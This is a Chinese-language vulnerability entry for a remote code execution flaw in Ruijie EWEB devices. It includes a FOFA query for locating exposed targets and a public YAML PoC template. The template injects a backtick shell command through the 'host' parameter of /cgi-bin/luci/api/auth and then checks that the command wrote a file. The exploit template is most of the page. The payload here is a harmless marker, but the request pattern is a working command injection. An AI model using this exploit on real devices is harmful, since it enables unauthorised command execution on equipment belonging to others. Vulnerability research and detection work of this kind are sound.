ruijie-eweb-route-auth-rce: 锐捷 EWEB auth 远程代码执行漏洞

日期: 2025-09-01 | 影响软件: Ruijie EWEB | POC: 已公开

漏洞描述

锐捷 EWEB 系列设备存在远程代码执行漏洞,攻击者可通过该漏洞在目标服务器上执行任意命令。 fofa: body="cgi-bin/luci" && body="#f47f3e"

PoC代码[已公开]

id: ruijie-eweb-route-auth-rce

info:
  name: 锐捷 EWEB auth 远程代码执行漏洞
  author: zan8in
  severity: critical
  verified: true
  description: |-
    锐捷 EWEB 系列设备存在远程代码执行漏洞,攻击者可通过该漏洞在目标服务器上执行任意命令。
    fofa: body="cgi-bin/luci" && body="#f47f3e"
  tags: ruijie,rce
  created: 2025/02/14

set:
  content: randomLowercase(10)
  filename: randomLowercase(10)
rules:
  r0:
    request:
      method: POST
      path: /cgi-bin/luci/api/auth
      headers:
        Content-Type: application/json
      body: |
        {"method":"checkNet","params":{"host":"`echo {{content}}>{{filename}}.txt`"}}
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /cgi-bin/{{filename}}.txt
    expression: response.status == 200 && response.body.bcontains(bytes(content))
expression: r0() && r1()

相关漏洞推荐